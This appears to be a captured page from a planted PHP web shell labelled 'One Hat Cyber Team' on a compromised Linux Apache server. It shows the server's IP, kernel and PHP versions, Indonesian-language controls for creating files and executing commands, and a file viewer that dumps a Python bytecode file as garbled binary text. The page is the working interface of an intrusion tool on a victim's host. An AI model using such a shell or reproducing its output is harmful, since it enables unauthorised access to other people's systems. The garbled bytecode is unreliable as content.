⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.212
Server IP:
97.74.87.16
Server:
Linux 16.87.74.97.host.secureserver.net 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64
Server Software:
Apache
PHP Version:
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
lib64
/
python3.9
/
lib2to3
/
fixes
/
__pycache__
/
View File Name :
fix_standarderror.cpython-39.opt-1.pyc
a �DOg� � @ s2 d Z ddlmZ ddlmZ G dd� dej�ZdS )z%Fixer for StandardError -> Exception.� )� fixer_base)�Namec @ s e Zd ZdZdZdd� ZdS )�FixStandarderrorTz- 'StandardError' c C s t d|jd�S )N� Exception)�prefix)r r )�selfZnode�results� r �7/usr/lib64/python3.9/lib2to3/fixes/fix_standarderror.py� transform s zFixStandarderror.transformN)�__name__� __module__�__qualname__Z BM_compatibleZPATTERNr r r r r r s r N)�__doc__� r Z fixer_utilr ZBaseFixr r r r r �<module> s